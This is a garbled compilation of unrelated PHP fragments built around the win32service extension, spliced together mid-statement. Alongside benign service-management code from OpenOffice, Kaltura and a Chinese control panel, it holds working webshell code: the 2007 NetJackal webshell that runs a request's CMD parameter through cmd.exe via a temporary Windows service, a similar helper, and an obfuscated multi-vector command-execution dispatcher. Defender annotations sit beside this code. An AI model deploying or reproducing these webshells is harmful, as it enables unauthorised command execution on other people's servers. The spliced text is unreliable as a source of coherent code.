// Webshell helper: runs $command through cmd.exe by registering a throw-away
// Windows service (binary = ComSpec, parameters = "/c <command> > <tmpfile>"),
// starting it, and immediately stopping/deleting it. Returns the captured
// stdout as a string. Requires the win32service extension and rights to talk
// to the Service Control Manager; the command presumably executes under the
// service's own account rather than the web server's — confirm for the host.
// Defender notes (everything below is visible in the code itself):
//  - Service name and display name are both uniqid('NJ') values and the
//    service only exists for the duration of one request; on Windows the
//    installation is recorded in the System event log (event 7045 on current
//    versions), including the cmd.exe image path and the "/c ... >" argument.
//  - The output file is <temp dir from whereistmP()>\NJ<uniqid> and is
//    unlinked after being read. whereistmP() is defined elsewhere in the file.
//  - $command is interpolated unquoted into the service parameters; no
//    validation or escaping happens here.
function srvshelL($command) {
    $name = whereistmP() . "\\" . uniqid('NJ');   // output capture file
    $n = uniqid('NJ');                             // service name == display name
    // ComSpec normally resolves to cmd.exe; the hard-coded fallback assumes a D: system drive.
    $cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
    win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\""));
    win32_start_service($n);
    win32_stop_service($n);
    win32_delete_service($n);
    // Polls with no upper bound until the redirected output file appears.
    while (!file_exists($name)) { sleep(1); }
    $exec = file_get_contents($name);
    unlink($name);
    return $exec;
}
// First we check the host:port to see if open office is running $sCheckOO = SearchHelper::checkOpenOfficeAvailablity(); if (empty($sCheckOO) && !$restartOO) { // If the check returns empty then it is available on that port so we exit if ($sGiveOutput) { echo 1; } exit; } // Open office appears not to be running or requires a restart if (OS_WINDOWS) { $OOService = 'ktopenoffice'; $default->log->debug('Check Open Office Task: ' . get_current_user()); if ($restartOO) { // If Open office needs to be restarted - stop it here $result_stop = win32_stop_service($OOService); // Wait for the service to stop fully before trying to restart it $continue = false; $cnt = 0; while ($continue === false && $cnt < 15) { $result = win32_query_service_status($OOService); if (isset($result['ProcessId']) && $result['ProcessId'] != 0) { // If there is still a process id then the service has not stopped yet. sleep(2); $continue = false; $cnt++; } else { $continue = true; } } } else {
/**
 * Asks the Service Control Manager to stop the service $this->name on
 * host $this->machine.
 *
 * The raw result of win32_stop_service() is kept in $this->last_error so a
 * caller can inspect the error code after a failed stop.
 * NOTE(review): newer win32service releases may throw instead of returning a
 * code — confirm against the installed extension version.
 *
 * @return bool true only when the extension reported WIN32_NO_ERROR
 */
function stop() {
    $status = win32_stop_service($this->name, $this->machine);
    $this->last_error = $status;
    return WIN32_NO_ERROR === $status;
}
} exit(0); case 'install': win32_create_service(array('service' => $serviceName, 'display' => 'Kaltura asynchronous batch jobs scheduler', 'description' => 'Kaltura asynchronous batch jobs scheduler', 'params' => __FILE__ . " run {$phpPath} {$iniDir}", 'path' => $phpPath, 'start_type' => WIN32_SERVICE_AUTO_START, 'error_control' => WIN32_SERVER_ERROR_NORMAL)); KalturaLog::info('Service Installed'); exit(0); case 'uninstall': win32_delete_service($serviceName); KalturaLog::info('Service Removed'); exit(0); case 'start': win32_start_service($serviceName); KalturaLog::info('Service Started'); exit(0); case 'stop': win32_stop_service($serviceName); KalturaLog::info('Service Stopped'); exit(0); case 'run': win32_start_service_ctrl_dispatcher($serviceName); win32_set_service_status(WIN32_SERVICE_RUNNING); break; case 'debug': set_time_limit(10); break; default: KalturaLog::info('Unkown action'); exit(-1); } $kscheduler = new KGenericScheduler($phpPath, $iniDir); while (1) {
###                                                 ###
### Note: Tested on 5.2.1                           ###
###                                                 ###
### Author: NetJackal                               ###
### Email: nima_501[at]yahoo[dot]com                ###
### Website: http://netjackal.by.ru                 ###
###                                                 ###
### Usage: http://victim.net/nj.php?CMD=[command]   ###
#####################################################
# Reference sample (milw0rm, 2007-07-27): a one-file webshell that runs the
# CMD query parameter through cmd.exe by creating, starting and deleting a
# one-shot Windows service with the win32service extension. The comments
# below point out the artifacts each step leaves on the host.
$command = isset($_GET['CMD']) ? $_GET['CMD'] : 'dir';  # command, taken verbatim from the request; no validation
$dir = ini_get('upload_tmp_dir');  # directory that receives the command's redirected output
if (!extension_loaded('win32service')) { die('win32service extension not found!'); }
$name = $dir . "\\" . uniqid('NJ');  # output capture file: <upload_tmp_dir>\NJ<uniqid value>
$n = uniqid('NJ');                   # service name and display name share the NJ prefix
# ComSpec normally resolves to cmd.exe; the hard-coded fallback assumes a D: system drive.
$cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
# The service binary is cmd.exe itself and the command plus output redirect go in
# the service parameters, so the host's service-installation log entry
# (System event log, event 7045 on current Windows) carries the full command line.
win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);  # the service exists only for the duration of this request
$exec = file_get_contents($name);
unlink($name);
echo "<pre>" . htmlspecialchars($exec) . "</pre>";  # output is HTML-escaped before display
?> # milw0rm.com [2007-07-27]
case '重启': win32_restart_service($service->item(0)->getElementsByTagName("mysql")->item(0)->nodeValue); echo '<SCRIPT>alert("MySQL重启命令执行完成")</SCRIPT>'; break; default: break; } switch ($_POST['filezilla']) { case '启动': win32_start_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue); echo '<SCRIPT>alert("FileZilla启动命令执行完成")</SCRIPT>'; break; case '停止': win32_stop_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue); echo '<SCRIPT>alert("FileZilla停止命令执行完成")</SCRIPT>'; break; case '重启': win32_stop_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue); sleep(5); win32_start_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue); echo '<SCRIPT>alert("FileZilla重启命令执行完成")</SCRIPT>'; break; default: break; } } else { echo '<hr/>您的服务器没有为PHP安装<b>win32service</b>扩展库,请前往PHP官方站点<a href="http://pecl.php.net/package/win32service">下载安装</a>至php的ext目录当中,并注意要在php.ini中添加<b>extension=php_win32service.dll;</b>语句,最后重新启动nginx生效!<u>注意:请核对好PHP版本</u>'; } ?> </center></body> </html>
// Command-execution dispatcher of an obfuscated PHP webshell (helper names are
// randomised). Given a shell command $c it tries whichever execution vector the
// host exposes and returns the captured output as a string ('' when $c is empty).
//   non-Windows ($win false): perl extension  ->  pcntl_fork + pcntl_exec of perl -e
//   Windows     ($win true):  FFI WinExec  ->  win32service  ->  win32std  ->  COM WScript.Shell
// $win and $tempdir are globals set elsewhere in the file. The sibling helpers are
// not visible here: z7r appears to test whether a function is usable, z9p appears
// to read a file's contents, z6l appears to transform the command string — confirm
// against their definitions.
// Defender notes: every Windows vector writes output to $tempdir . 'NJ<uniqid>' and
// the pcntl vector to $tempdir . 'pcntl<uniqid>', both unlinked afterwards; the
// win32service vector creates and deletes a service named NJ<uniqid> whose image
// path is cmd.exe within a single request; most calls are @-suppressed, so PHP's
// own error log is unlikely to show failures.
function z6v($c) {
    global $win, $tempdir;
    $r = '';
    if (!empty($c)) {
        if (!$win) {
            if (extension_loaded('perl')) {
                // Vector 1: embedded perl interpreter; output is captured via output buffering.
                @ob_start();
                $p = new perl();
                $p->eval("system('{$c}')");
                $r = @ob_get_contents();
                @ob_end_clean();
            } elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
                // Vector 2: fork, then replace the child with perl running the command
                // with output redirected to $o. Whatever the parent puts in $r here
                // is overwritten by the z9p($o) assignment after the branch.
                $r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
                $o = $tempdir . uniqid('pcntl');
                $pid = @pcntl_fork();
                if ($pid == -1) {
                    $r .= '[-] Could not fork. Exit';
                } elseif ($pid) {
                    // Parent process.
                    $r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
                } else {
                    // Child process: tries two perl locations, terminates either way.
                    $c = array(" -e 'system(\"{$c} > {$o}\")'");
                    if (@pcntl_exec('/usr/bin/perl', $c)) { exit(0); }
                    if (@pcntl_exec('/usr/local/bin/perl', $c)) { exit(0); }
                    die;
                }
                $r = z9p($o);
                @unlink($o);
            }
        } else {
            $o = $tempdir . uniqid('NJ');
            if (extension_loaded('ffi')) {
                // Vector 3: kernel32!WinExec through PHP FFI; polls (no timeout) until the output file exists.
                $a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
                $r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
                while (!@file_exists($o)) { sleep(1); }
                $r = z9p($o);
            } elseif (extension_loaded('win32service')) {
                // Vector 4: throw-away service whose binary is cmd.exe and whose
                // parameters hold the command; created, started, stopped and deleted in sequence.
                $s = uniqid('NJ');
                @win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
                @win32_start_service($s);
                @win32_stop_service($s);
                @win32_delete_service($s);
                while (!@file_exists($o)) { sleep(1); }
                $r = z9p($o);
            } elseif (extension_loaded("win32std")) {
                // Vector 5: win32std's win_shell_execute, reaching cmd.exe via a relative path that climbs to the drive root.
                @win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                while (!@file_exists($o)) { sleep(1); }
                $r = z9p($o);
            } else {
                // Vector 6: COM WScript.Shell.Run; unlike the vectors above it reads $o without waiting for it to exist.
                $a = new COM("WScript.Shell");
                $a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                $r = z9p($o);
            }
            @unlink($o);
        }
    }
    return $r;
}